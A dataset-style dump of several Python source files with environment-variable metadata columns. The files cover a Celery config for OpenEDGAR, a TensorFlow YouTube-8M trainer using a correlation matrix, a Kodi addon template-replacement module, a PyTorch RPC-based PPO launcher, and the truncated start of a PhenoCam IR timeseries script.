furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('lexpredict_openedgar')
class CeleryConfig(AppConfig):
name = 'lexpredict_openedgar.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
installed_apps = [app_config.name for app_config in apps.get_app_configs()]
app.autodiscover_tasks(lambda: installed_apps, force=True)
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
| []
| []
| []
| [] | [] | python | 0 | 0 | |
other_train/train_loadCorrMat.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Binary for training Tensorflow models on the YouTube-8M dataset."""
import json
import os
import time
import eval_util
import export_model
import losses
import frame_level_models
import video_level_models
import readers
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow import app
from tensorflow import flags
from tensorflow import gfile
from tensorflow import logging
from tensorflow.python.client import device_lib
import utils
import numpy as np
FLAGS = flags.FLAGS
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
if __name__ == "__main__":
# Dataset flags.
flags.DEFINE_string("train_dir", "/tmp/yt8m_model/",
"The directory to save the model files in.")
flags.DEFINE_string(
"train_data_pattern", "",
"File glob for the training dataset. If the files refer to Frame Level "
"features (i.e. tensorflow.SequenceExample), then set --reader_type "
"format. The (Sequence)Examples are expected to have 'rgb' byte array "
"sequence feature as well as a 'labels' int64 context feature.")
flags.DEFINE_string("feature_names", "mean_rgb", "Name of the feature "
"to use for training.")
flags.DEFINE_string("feature_sizes", "1024", "Length of the feature vectors.")
# Model flags.
flags.DEFINE_bool(
"frame_features", False,
"If set, then --train_data_pattern must be frame-level features. "
"Otherwise, --train_data_pattern must be aggregated video-level "
"features. The model must also be set appropriately (i.e. to read 3D "
"batches VS 4D batches.")
flags.DEFINE_string(
"model", "LogisticModel",
"Which architecture to use for the model. Models are defined "
"in models.py.")
flags.DEFINE_bool(
"start_new_model", False,
"If set, this will not resume from a checkpoint and will instead create a"
" new model instance.")
# Training flags.
flags.DEFINE_integer("num_gpu", 1,
"The maximum number of GPU devices to use for training. "
"Flag only applies if GPUs are installed")
flags.DEFINE_integer("batch_size", 1024,
"How many examples to process per batch for training.")
flags.DEFINE_string("label_loss", "CrossEntropyLoss",
"Which loss function to use for training the model.")
flags.DEFINE_float(
"regularization_penalty", 1.0,
"How much weight to give to the regularization loss (the label loss has "
"a weight of 1).")
flags.DEFINE_float("base_learning_rate", 0.01,
"Which learning rate to start with.")
flags.DEFINE_float("learning_rate_decay", 0.95,
"Learning rate decay factor to be applied every "
"learning_rate_decay_examples.")
flags.DEFINE_float("learning_rate_decay_examples", 4000000,
"Multiply current learning rate by learning_rate_decay "
"every learning_rate_decay_examples.")
flags.DEFINE_integer("num_epochs", 5,
"How many passes to make over the dataset before "
"halting training.")
flags.DEFINE_integer("max_steps", None,
"The maximum number of iterations of the training loop.")
flags.DEFINE_integer("export_model_steps", 10000000000,
"The period, in number of steps, with which the model "
"is exported for batch prediction.")
flags.DEFINE_float("save_checkpoint_every_n_hour", 0.4,
"Save the checkpoint every n hours.")
flags.DEFINE_integer("validate_every_n_training_steps", 100,
"eval on training for every n steps")
# Other flags.
flags.DEFINE_integer("num_readers", 12,
"How many threads to use for reading input files.")
flags.DEFINE_string("optimizer", "AdamOptimizer",
"What optimizer class to use.")
flags.DEFINE_float("clip_gradient_norm", 1.0, "Norm to clip gradients to.")
flags.DEFINE_bool(
"log_device_placement", False,
"Whether to write the device on which every op will run into the "
"logs on startup.")
def validate_class_name(flag_value, category, modules, expected_superclass):
"""Checks that the given string matches a class of the expected type.
Args:
flag_value: A string naming the class to instantiate.
category: A string used further describe the class in error messages
(e.g. 'model', 'reader', 'loss').
modules: A list of modules to search for the given class.
expected_superclass: A class that the given class should inherit from.
Raises:
FlagsError: If the given class could not be found or if the first class
found with that name doesn't inherit from the expected superclass.
Returns:
True if a class was found that matches the given constraints.
"""
candidates = [getattr(module, flag_value, None) for module in modules]
for candidate in candidates:
if not candidate:
continue
if not issubclass(candidate, expected_superclass):
raise flags.FlagsError("%s '%s' doesn't inherit from %s." %
(category, flag_value,
expected_superclass.__name__))
return True
raise flags.FlagsError("Unable to find %s '%s'." % (category, flag_value))
def get_input_data_tensors(reader,
data_pattern,
batch_size=1000,
num_epochs=None,
num_readers=1):
"""Creates the section of the graph which reads the training data.
Args:
reader: A class which parses the training data.
data_pattern: A 'glob' style path to the data files.
batch_size: How many examples to process at a time.
num_epochs: How many passes to make over the training data. Set to 'None'
to run indefinitely.
num_readers: How many I/O threads to use.
Returns:
A tuple containing the features tensor, labels tensor, and optionally a
tensor containing the number of frames per video. The exact dimensions
depend on the reader being used.
Raises:
IOError: If no files matching the given pattern were found.
"""
logging.info("Using batch size of " + str(batch_size) + " for training.")
with tf.name_scope("train_input"):
files = gfile.Glob(data_pattern)
if not files:
raise IOError("Unable to find training files. data_pattern='" +
data_pattern + "'.")
logging.info("Number of training files: %s.", str(len(files)))
filename_queue = tf.train.string_input_producer(
files, num_epochs=num_epochs, shuffle=True)
training_data = [
reader.prepare_reader(filename_queue) for _ in range(num_readers)
]
return tf.train.shuffle_batch_join(
training_data,
batch_size=batch_size,
capacity=batch_size * 5,
min_after_dequeue=batch_size,
allow_smaller_final_batch=True,
enqueue_many=True)
def find_class_by_name(name, modules):
"""Searches the provided modules for the named class and returns it."""
modules = [getattr(module, name, None) for module in modules]
return next(a for a in modules if a)
def build_graph(reader,
model,
train_data_pattern,
label_loss_fn=losses.CrossEntropyLoss(),
batch_size=1000,
base_learning_rate=0.01,
learning_rate_decay_examples=1000000,
learning_rate_decay=0.95,
optimizer_class=tf.train.AdamOptimizer,
clip_gradient_norm=1.0,
regularization_penalty=1,
num_readers=1,
num_epochs=None,
corr_mat=None):
"""Creates the Tensorflow graph.
This will only be called once in the life of
a training model, because after the graph is created the model will be
restored from a meta graph file rather than being recreated.
Args:
reader: The data file reader. It should inherit from BaseReader.
model: The core model (e.g. logistic or neural net). It should inherit
from BaseModel.
train_data_pattern: glob path to the training data files.
label_loss_fn: What kind of loss to apply to the model. It should inherit
from BaseLoss.
batch_size: How many examples to process at a time.
base_learning_rate: What learning rate to initialize the optimizer with.
optimizer_class: Which optimization algorithm to use.
clip_gradient_norm: Magnitude of the gradient to clip to.
regularization_penalty: How much weight to give the regularization loss
compared to the label loss.
num_readers: How many threads to use for I/O operations.
num_epochs: How many passes to make over the data. 'None' means an
unlimited number of passes.
"""
global_step = tf.Variable(0, trainable=False, name="global_step")
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == 'GPU']
gpus = gpus[:FLAGS.num_gpu]
num_gpus = len(gpus)
if num_gpus > 0:
logging.info("Using the following GPUs to train: " + str(gpus))
num_towers = num_gpus
device_string = '/gpu:%d'
else:
logging.info("No GPUs found. Training on CPU.")
num_towers = 1
device_string = '/cpu:%d'
learning_rate = tf.train.exponential_decay(
base_learning_rate,
global_step * batch_size * num_towers,
learning_rate_decay_examples,
learning_rate_decay,
staircase=True)
tf.summary.scalar('learning_rate', learning_rate)
optimizer = optimizer_class(learning_rate)
unused_video_id, model_input_raw, labels_batch, num_frames = (
get_input_data_tensors(
reader,
train_data_pattern,
batch_size=batch_size * num_towers,
num_readers=num_readers,
num_epochs=num_epochs))
tf.summary.histogram("model/input_raw", model_input_raw)
feature_dim = len(model_input_raw.get_shape()) - 1
model_input = tf.nn.l2_normalize(model_input_raw, feature_dim)
tower_inputs = tf.split(model_input, num_towers)
tower_labels = tf.split(labels_batch, num_towers)
tower_num_frames = tf.split(num_frames, num_towers)
tower_gradients = []
tower_predictions = []
tower_label_losses = []
tower_reg_losses = []
for i in range(num_towers):
# For some reason these 'with' statements can't be combined onto the same
# line. They have to be nested.
with tf.device(device_string % i):
with (tf.variable_scope(("tower"), reuse=True if i > 0 else None)):
with (slim.arg_scope([slim.model_variable, slim.variable], device="/cpu:0" if num_gpus!=1 else "/gpu:0")):
result = model.create_model(
tower_inputs[i],
num_frames=tower_num_frames[i],
vocab_size=reader.num_classes,
corr_mat_init=corr_mat,
labels=tower_labels[i])
for variable in slim.get_model_variables():
tf.summary.histogram(variable.op.name, variable)
predictions0 = result["predictions0"]
predictions = result["predictions"]
tower_predictions.append(predictions)
label_loss = label_loss_fn.calculate_loss(predictions0, tower_labels[i])
if "regularization_loss" in result.keys():
reg_loss = result["regularization_loss"]
else:
reg_loss = tf.constant(0.0)
reg_losses = tf.losses.get_regularization_losses()
if reg_losses:
reg_loss += tf.add_n(reg_losses)
tower_reg_losses.append(reg_loss)
# Adds update_ops (e.g., moving average updates in batch normalization) as
# a dependency to the train_op.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
if "update_ops" in result.keys():
update_ops += result["update_ops"]
if update_ops:
with tf.control_dependencies(update_ops):
barrier = tf.no_op(name="gradient_barrier")
with tf.control_dependencies([barrier]):
label_loss = tf.identity(label_loss)
tower_label_losses.append(label_loss)
# Incorporate the L2 weight penalties etc.
final_loss = regularization_penalty * reg_loss + label_loss
gradients = optimizer.compute_gradients(final_loss,
colocate_gradients_with_ops=False)
tower_gradients.append(gradients)
label_loss = tf.reduce_mean(tf.stack(tower_label_losses))
tf.summary.scalar("label_loss", label_loss)
if regularization_penalty != 0:
reg_loss = tf.reduce_mean(tf.stack(tower_reg_losses))
tf.summary.scalar("reg_loss", reg_loss)
merged_gradients = utils.combine_gradients(tower_gradients)
if clip_gradient_norm > 0:
with tf.name_scope('clip_grads'):
merged_gradients = utils.clip_gradient_norms(merged_gradients, clip_gradient_norm)
train_op = optimizer.apply_gradients(merged_gradients, global_step=global_step)
tf.add_to_collection("global_step", global_step)
tf.add_to_collection("loss", label_loss)
tf.add_to_collection("predictions", tf.concat(tower_predictions, 0))
tf.add_to_collection("input_batch_raw", model_input_raw)
tf.add_to_collection("input_batch", model_input)
tf.add_to_collection("num_frames", num_frames)
tf.add_to_collection("labels", tf.cast(labels_batch, tf.float32))
tf.add_to_collection("train_op", train_op)
class Trainer(object):
"""A Trainer to train a Tensorflow graph."""
def __init__(self, cluster, task, train_dir, model, reader, model_exporter,
log_device_placement=True, max_steps=None,
export_model_steps=1000, corr_mat = None):
""""Creates a Trainer.
Args:
cluster: A tf.train.ClusterSpec if the execution is distributed.
None otherwise.
task: A TaskSpec describing the job type and the task index.
"""
self.cluster = cluster
self.task = task
self.is_master = (task.type == "master" and task.index == 0)
self.train_dir = train_dir
self.config = tf.ConfigProto(
allow_soft_placement=True,log_device_placement=log_device_placement)
self.model = model
self.reader = reader
self.model_exporter = model_exporter
self.max_steps = max_steps
self.max_steps_reached = False
self.export_model_steps = export_model_steps
self.last_model_export_step = 0
self.corr_mat = corr_mat
# if self.is_master and self.task.index > 0:
# raise StandardError("%s: Only one replica of master expected",
# task_as_string(self.task))
def run(self, start_new_model=False):
"""Performs training on the currently defined Tensorflow graph.
Returns:
A tuple of the training Hit@1 and the training PERR.
"""
if self.is_master and start_new_model:
self.remove_training_directory(self.train_dir)
if not os.path.exists(self.train_dir):
os.makedirs(self.train_dir)
model_flags_dict = {
"model": FLAGS.model,
"feature_sizes": FLAGS.feature_sizes,
"feature_names": FLAGS.feature_names,
"frame_features": FLAGS.frame_features,
"label_loss": FLAGS.label_loss,
}
flags_json_path = os.path.join(FLAGS.train_dir, "model_flags.json")
if os.path.exists(flags_json_path):
existing_flags = json.load(open(flags_json_path))
if existing_flags != model_flags_dict:
logging.error("Model flags do not match existing file %s. Please "
"delete the file, change --train_dir, or pass flag "
"--start_new_model",
flags_json_path)
logging.error("Ran model with flags: %s", str(model_flags_dict))
logging.error("Previously ran with flags: %s", str(existing_flags))
exit(1)
else:
# Write the file.
with open(flags_json_path, "w") as fout:
fout.write(json.dumps(model_flags_dict))
target, device_fn = self.start_server_if_distributed()
meta_filename = self.get_meta_filename(start_new_model, self.train_dir)
with tf.Graph().as_default() as graph:
if meta_filename:
saver = self.recover_model(meta_filename)
with tf.device(device_fn):
if not meta_filename:
saver = self.build_model(self.model, self.reader, self.corr_mat)
global_step = tf.get_collection("global_step")[0]
loss = tf.get_collection("loss")[0]
predictions = tf.get_collection("predictions")[0]
labels = tf.get_collection("labels")[0]
train_op = tf.get_collection("train_op")[0]
init_op = tf.global_variables_initializer()
sv = tf.train.Supervisor(
graph,
logdir=self.train_dir,
init_op=init_op,
is_chief=self.is_master,
global_step=global_step,
#save_model_secs=15 * 60,
save_model_secs=int(FLAGS.save_checkpoint_every_n_hour * 3600),
#save_summaries_secs=120,
save_summaries_secs=int(FLAGS.save_checkpoint_every_n_hour * 3600),
saver=saver)
logging.info("%s: Starting managed session.", task_as_string(self.task))
with sv.managed_session(target, config=self.config) as sess:
try:
logging.info("%s: Entering training loop.", task_as_string(self.task))
while (not sv.should_stop()) and (not self.max_steps_reached):
batch_start_time = time.time()
_, global_step_val, loss_val, predictions_val, labels_val = sess.run(
[train_op, global_step, loss, predictions, labels])
seconds_per_batch = time.time() - batch_start_time
examples_per_second = labels_val.shape[0] / seconds_per_batch
if self.max_steps and self.max_steps <= global_step_val:
self.max_steps_reached = True
#if self.is_master and global_step_val % 10 == 0 and self.train_dir:
if self.is_master and global_step_val % FLAGS.validate_every_n_training_steps == 0 and self.train_dir:
eval_start_time = time.time()
hit_at_one = eval_util.calculate_hit_at_one(predictions_val, labels_val)
perr = eval_util.calculate_precision_at_equal_recall_rate(predictions_val,
labels_val)
gap = eval_util.calculate_gap(predictions_val, labels_val)
eval_end_time = time.time()
eval_time = eval_end_time - eval_start_time
logging.info("training step " + str(global_step_val) + " | Loss: " + ("%.2f" % loss_val) +
" Examples/sec: " + ("%.2f" % examples_per_second) + " | Hit@1: " +
("%.2f" % hit_at_one) + " PERR: " + ("%.2f" % perr) +
" GAP: " + ("%.2f" % gap))
sv.summary_writer.add_summary(
utils.MakeSummary("model/Training_Hit@1", hit_at_one),
global_step_val)
sv.summary_writer.add_summary(
utils.MakeSummary("model/Training_Perr", perr), global_step_val)
sv.summary_writer.add_summary(
utils.MakeSummary("model/Training_GAP", gap), global_step_val)
sv.summary_writer.add_summary(
utils.MakeSummary("global_step/Examples/Second",
examples_per_second), global_step_val)
sv.summary_writer.flush()
with open(FLAGS.train_dir + '/global_step_{%d}_training_GAP_{%.6f}.txt' % (global_step_val, gap), 'w') as f:
f.write('\n')
# Exporting the model every x steps
time_to_export = ((self.last_model_export_step == 0) or
(global_step_val - self.last_model_export_step
>= self.export_model_steps))
if self.is_master and time_to_export:
self.export_model(global_step_val, sv.saver, sv.save_path, sess)
self.last_model_export_step = global_step_val
else:
#logging.info("training step " + str(global_step_val) + " | Loss: " +
#("%.2f" % loss_val) + " Examples/sec: " + ("%.2f" % examples_per_second))
continue
except tf.errors.OutOfRangeError:
logging.info("%s: Done training -- epoch limit reached.",
task_as_string(self.task))
logging.info("%s: Exited training loop.", task_as_string(self.task))
sv.Stop()
def export_model(self, global_step_val, saver, save_path, session):
# If the model has already been exported at this step, return.
if global_step_val == self.last_model_export_step:
return
last_checkpoint = saver.save(session, save_path, global_step_val)
model_dir = "{0}/export/step_{1}".format(self.train_dir, global_step_val)
logging.info("%s: Exporting the model at step %s to %s.",
task_as_string(self.task), global_step_val, model_dir)
self.model_exporter.export_model(
model_dir=model_dir,
global_step_val=global_step_val,
last_checkpoint=last_checkpoint)
def start_server_if_distributed(self):
"""Starts a server if the execution is distributed."""
if self.cluster:
logging.info("%s: Starting trainer within cluster %s.",
task_as_string(self.task), self.cluster.as_dict())
server = start_server(self.cluster, self.task)
target = server.target
device_fn = tf.train.replica_device_setter(
ps_device="/job:ps",
worker_device="/job:%s/task:%d" % (self.task.type, self.task.index),
cluster=self.cluster)
else:
target = ""
device_fn = ""
return (target, device_fn)
def remove_training_directory(self, train_dir):
"""Removes the training directory."""
try:
logging.info(
"%s: Removing existing train directory.",
task_as_string(self.task))
gfile.DeleteRecursively(train_dir)
except:
logging.error(
"%s: Failed to delete directory " + train_dir +
" when starting a new model. Please delete it manually and" +
" try again.", task_as_string(self.task))
def get_meta_filename(self, start_new_model, train_dir):
if start_new_model:
logging.info("%s: Flag 'start_new_model' is set. Building a new model.",
task_as_string(self.task))
return None
latest_checkpoint = tf.train.latest_checkpoint(train_dir)
if not latest_checkpoint:
logging.info("%s: No checkpoint file found. Building a new model.",
task_as_string(self.task))
return None
meta_filename = latest_checkpoint + ".meta"
if not gfile.Exists(meta_filename):
logging.info("%s: No meta graph file found. Building a new model.",
task_as_string(self.task))
return None
else:
return meta_filename
def recover_model(self, meta_filename):
logging.info("%s: Restoring from meta graph file %s",
task_as_string(self.task), meta_filename)
return tf.train.import_meta_graph(meta_filename)
def build_model(self, model, reader, corr_mat = None):
"""Find the model and build the graph."""
label_loss_fn = find_class_by_name(FLAGS.label_loss, [losses])()
optimizer_class = find_class_by_name(FLAGS.optimizer, [tf.train])
build_graph(reader=reader,
model=model,
optimizer_class=optimizer_class,
clip_gradient_norm=FLAGS.clip_gradient_norm,
train_data_pattern=FLAGS.train_data_pattern,
label_loss_fn=label_loss_fn,
base_learning_rate=FLAGS.base_learning_rate,
learning_rate_decay=FLAGS.learning_rate_decay,
learning_rate_decay_examples=FLAGS.learning_rate_decay_examples,
regularization_penalty=FLAGS.regularization_penalty,
num_readers=FLAGS.num_readers,
batch_size=FLAGS.batch_size,
num_epochs=FLAGS.num_epochs,
corr_mat = corr_mat)
return tf.train.Saver(max_to_keep=0, keep_checkpoint_every_n_hours=FLAGS.save_checkpoint_every_n_hour)
def get_reader():
# Convert feature_names and feature_sizes to lists of values.
feature_names, feature_sizes = utils.GetListOfFeatureNamesAndSizes(
FLAGS.feature_names, FLAGS.feature_sizes)
if FLAGS.frame_features:
reader = readers.YT8MFrameFeatureReader(
feature_names=feature_names, feature_sizes=feature_sizes)
else:
reader = readers.YT8MAggregatedFeatureReader(
feature_names=feature_names, feature_sizes=feature_sizes)
return reader
class ParameterServer(object):
"""A parameter server to serve variables in a distributed execution."""
def __init__(self, cluster, task):
"""Creates a ParameterServer.
Args:
cluster: A tf.train.ClusterSpec if the execution is distributed.
None otherwise.
task: A TaskSpec describing the job type and the task index.
"""
self.cluster = cluster
self.task = task
def run(self):
"""Starts the parameter server."""
logging.info("%s: Starting parameter server within cluster %s.",
task_as_string(self.task), self.cluster.as_dict())
server = start_server(self.cluster, self.task)
server.join()
def start_server(cluster, task):
"""Creates a Server.
Args:
cluster: A tf.train.ClusterSpec if the execution is distributed.
None otherwise.
task: A TaskSpec describing the job type and the task index.
"""
if not task.type:
raise ValueError("%s: The task type must be specified." %
task_as_string(task))
if task.index is None:
raise ValueError("%s: The task index must be specified." %
task_as_string(task))
# Create and start a server.
return tf.train.Server(
tf.train.ClusterSpec(cluster),
protocol="grpc",
job_name=task.type,
task_index=task.index)
def task_as_string(task):
return "/job:%s/task:%s" % (task.type, task.index)
def main(unused_argv):
# Load the environment.
env = json.loads(os.environ.get("TF_CONFIG", "{}"))
# Load the cluster data from the environment.
cluster_data = env.get("cluster", None)
cluster = tf.train.ClusterSpec(cluster_data) if cluster_data else None
# Load the task data from the environment.
task_data = env.get("task", None) or {"type": "master", "index": 0}
task = type("TaskSpec", (object,), task_data)
# Logging the version.
logging.set_verbosity(tf.logging.INFO)
logging.info("%s: Tensorflow version: %s.",
task_as_string(task), tf.__version__)
# Dispatch to a master, a worker, or a parameter server.
if not cluster or task.type == "master" or task.type == "worker":
model = find_class_by_name(FLAGS.model,
[frame_level_models, video_level_models])()
reader = get_reader()
model_exporter = export_model.ModelExporter(
frame_features=FLAGS.frame_features,
model=model,
reader=reader)
mat_dir = '/home/weimin/yt8m/code/youtube-8m/'
with open(mat_dir + 'corr_mat.npz', 'rb') as f:
corr_mat = np.load(f)
Trainer(cluster, task, FLAGS.train_dir, model, reader, model_exporter,
FLAGS.log_device_placement, FLAGS.max_steps,
FLAGS.export_model_steps, corr_mat).run(start_new_model=FLAGS.start_new_model)
elif task.type == "ps":
ParameterServer(cluster, task).run()
else:
raise ValueError("%s: Invalid task_type: %s." %
(task_as_string(task), task.type))
if __name__ == "__main__":
app.run()
| []
| []
| [
"TF_CONFIG",
"TF_CPP_MIN_LOG_LEVEL"
]
| [] | ["TF_CONFIG", "TF_CPP_MIN_LOG_LEVEL"] | python | 2 | 0 | |
plugin.video.mrknow/lib/customReplacements.py | # -*- coding: utf-8 -*-
import os.path
import re
from string import lower
import common
import utils.fileUtils as fu
from utils.regexUtils import findall
class CustomReplacements(object):
def __init__(self):
self.simpleScheme = {'(@PLATFORM@)': os.environ.get('OS'),
'(@CURRENT_URL@)': fu.getFileContent(os.path.join(common.Paths.cacheDir, 'lasturl')),
'(@LANGUAGE@)': self.languageShortName(common.language)
}
self.complexScheme = { 'import': '(#*@IMPORT=([^@]+)@)',
'find': '(#*@FIND\(.*?\)@)',
'catch': '(#*@CATCH\([^\)]+\)@)'
}
def languageShortName(self, longName):
if str(longName).lower() == 'german':
return 'de'
else:
return 'en'
def regex(self, item):
return self.complexScheme.get(item)
def __replaceImports(self, pathToImports, data):
while True:
m_reg = findall(data, self.regex('import'))
if len(m_reg) > 0:
for idat in m_reg:
if idat[0].startswith('#'):
data = data.replace(idat[0],'')
continue
filename = idat[1]
pathImp = os.path.join(common.Paths.modulesDir, filename)
if not os.path.exists(pathImp):
pathImp = os.path.join(pathToImports, filename)
if not (os.path.exists(pathImp)):
common.log('Skipped Import: ' + filename)
continue
dataImp = fu.getFileContent(pathImp)
dataImp = dataImp.replace('\r\n','\n')
data = data.replace(idat[0], dataImp)
else:
break
return data
def __replaceParameters(self, data, params=[]):
i=1
for par in params:
matches = findall(data,'(@PARAM' + str(i) + '@)')
if matches:
for m in matches:
ptemp = str(par).strip()
data = data.replace(m, ptemp)
i = i + 1
return data
def __replaceFinders(self, data):
m_reg = findall(data, self.regex('find'))
if len(m_reg) > 0:
for idat in m_reg:
if idat.startswith('#'):
continue
ps = idat[6:-2].strip().split(',')
method = ps[0].strip("'")
param1 = ps[1].strip("'")
param2 = ps[2].strip("'")
param3 = ps[3].strip("'")
if method == 'JS1':
jsName = param1
idName = param2
varName = param3
regex = "(?:java)?scr(?:'\+')?ipt[^<]+" + idName + "\s*=\s*[\"']([^\"']+)[\"'][^<]*</scr(?:'\+')?ipt\s*>[^<]*<scr(?:'\+')?ipt[^<]*src=[\"']" + jsName + "[\"']"
lines = "item_infos=" + regex + "\nitem_order=" + varName
data = data.replace(idat, lines)
return data
def __replaceCatchers(self, data):
m_reg = findall(data, self.regex('catch'))
if not (m_reg is None or len(m_reg) == 0):
for idat in m_reg:
if idat.startswith('#'):
continue
ps = idat[7:-2].strip().split(',')
catcherName = ps.pop(0).strip()
# import catcher file and insert parameters
pathImp = os.path.join(common.Paths.catchersDir, catcherName + '.txt')
if not (os.path.exists(pathImp)):
common.log('Skipped Catcher: ' + catcherName)
continue
dataImp = fu.getFileContent(pathImp)
for i in range(len(ps)):
dataImp = dataImp.replace('@PARAM' + str(i+1) + '@',ps.pop(i).strip())
dataImp = dataImp.replace('\r\n','\n')
dataImp += "\nitem_info_name=type\nitem_info_build=video\nitem_url_build=%s"
data = data.replace(idat, dataImp)
return data
def __replaceSimpleVars(self, data):
for s in self.simpleScheme:
m_reg = findall(data, s)
value = self.simpleScheme.get(s)
for idat in m_reg:
data = data.replace(idat, value)
return data
def __replaceConditions(self, data):
starts = [match.start() for match in re.finditer(re.escape('@IF('), data)]
for j in range(len(starts)-1,-1,-1):
s = starts[j]
p_reg = re.compile('((@IF\((.+?)\)@).*?(@ENDIF@))', re.IGNORECASE + re.DOTALL + re.MULTILINE)
m_reg = p_reg.findall(data[s:])
if len(m_reg) > 0:
for m in m_reg:
new_reg=p_reg.match(m[0])
condStr = new_reg.group(3)
hidePassage=False
if condStr.find('==') != -1:
condArr=condStr.split('==')
hidePassage = condArr[0].strip().lower() != condArr[1].strip().lower()
elif condStr.find('!=') != -1:
condArr=condStr.split('!=')
hidePassage = condArr[0].strip().lower() == condArr[1].strip().lower()
if hidePassage:
data = data.replace(str(new_reg.group(1)),'')
else:
tmpdata = str(new_reg.group(1))
tmpdata = tmpdata.replace(str(new_reg.group(2)),'',1)
tmpdata = tmpdata[:-len(str(new_reg.group(4)))]
data = data.replace(str(new_reg.group(1)),tmpdata)
return data
def replace(self, pathToImports, data, lItem, params=[]):
data = self.__replaceParameters(data, params)
data = self.__replaceConditions(data)
data = self.__replaceImports(pathToImports, data)
data = self.__replaceParameters(data, params)
data = self.__replaceFinders(data)
data = self.__replaceCatchers(data)
data = self.__replaceSimpleVars(data)
data = self.__replaceConditions(data)
return data
| []
| []
| [
"OS"
]
| [] | ["OS"] | python | 1 | 0 | |
train/myppo/train_ppo.py | import copy
import glob
import os
import sys
import time
from collections import deque
import random
from functools import partial
import gym
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributed import rpc
import torch.multiprocessing as mp
import sumolib
from .a2c_ppo_acktr.arguments import get_args
from .a2c_ppo_acktr.envs import make_vec_envs
from .a2c_ppo_acktr.model import Policy
from .a2c_ppo_acktr.storage import RolloutStorage
from .a2c_ppo_acktr.trainer import Trainer
from .evaluation import evaluate
def train(rank, args, flow_params=None):
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = str(args.master_port)
if rank == 0:
rpc_opt = rpc.TensorPipeRpcBackendOptions(num_worker_threads=\
max(16, args.num_splits * args.num_actors), rpc_timeout=500)
rpc.init_rpc('agent', rank=rank, world_size=args.num_actors + 1, rpc_backend_options=rpc_opt)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
if args.cuda and torch.cuda.is_available() and args.cuda_deterministic:
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
# envs = make_vec_envs(args.env_name, args.seed, 1, \
# args.gamma, save_path, device, False, \
# port=args.port, popart_reward=args.popart_reward, \
# flow_params=flow_params, reward_scale=args.reward_scale, \
# verbose=args.verbose)
trainer = Trainer(args, flow_params)
trainer.run()
else:
rpc_opt = rpc.TensorPipeRpcBackendOptions(rpc_timeout=500)
rpc.init_rpc('actor_' + str(rank - 1), rank=rank, world_size=args.num_actors + 1, rpc_backend_options=rpc_opt)
rpc.shutdown()
def train_ppo(flow_params=None):
mp.set_start_method('spawn')
args = get_args(sys.argv[2:])
args.master_port = sumolib.miscutils.getFreeSocketPort()
procs = []
for i in range(args.num_actors + 1):
p = mp.Process(target=train, args=(i, args, flow_params))
p.start()
procs.append(p)
for p in procs:
p.join()
if __name__ == "__main__":
train_ppo()
| []
| []
| [
"MASTER_ADDR",
"MASTER_PORT"
]
| [] | ["MASTER_ADDR", "MASTER_PORT"] | python | 2 | 0 | |
src/vegindex/update_roi_ir_timeseries.py | #!/usr/bin/env python
"""
Update an ROI IR timeseries CSV file.
"""
from __future__ import absolute_import
from __future__ import print_function
import argparse
import os
import sys
from datetime import timedelta
# try python3 import then python2 import
try:
from configparser import ConfigParser as configparser
except ImportError:
from ConfigParser import SafeConfigParser as configparser
# use this because numpy/openblas is automatically multi-threaded.
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
import numpy as np
from PIL import Image
import vegindex as vi
from vegindex.ir_roitimeseries import IRROITimeSeries
from vegindex.vegindex import get_roi_list
from . import utils
# use this because numpy/openblas is automatically multi-threaded.
os.environ["OMP_NUM_THREADS"] = "1"
# set vars
# you can set the archive directory to somewhere else for testing by
# using the env variable, PHENOCAM_ARCHIVE_DIR.
archive_dir = vi.config.archive_dir
debug = False
default_resize = vi.config.RESIZE
# if __name__ == "__main__":
def main():
# set up command line argument processing
parser = argparse.ArgumentParser()
# options
parser.add_argument(
"-v",
"--verbose",
help="increase output verbosity",
action="store_true",
default=False,
)
parser.add_argument(
"-n",
"--dry-run",
help="Process data but don't save results",
action="store_true",
default=False,
)
# positional arguments
parser.add_argument("site", help="PhenoCam site name")
parser.add_argument("roiname", help="ROI name, e.g. canopy_0001")
# get args
args = parser.parse_args()
sitename = args.site
roiname = args.roiname
verbose = args.verbose
dryrun = args.dry_run
if verbose:
print("site: {0}".format(sitename))
print("roiname: {0}".format(roiname))
print("verbose: {0}".format(verbose))
print("dryrun: {0}".format(dryrun))
# set input/output filename
inname = "%s_%s_IR_roistats.csv" % (sitename, roiname)
outname = inname
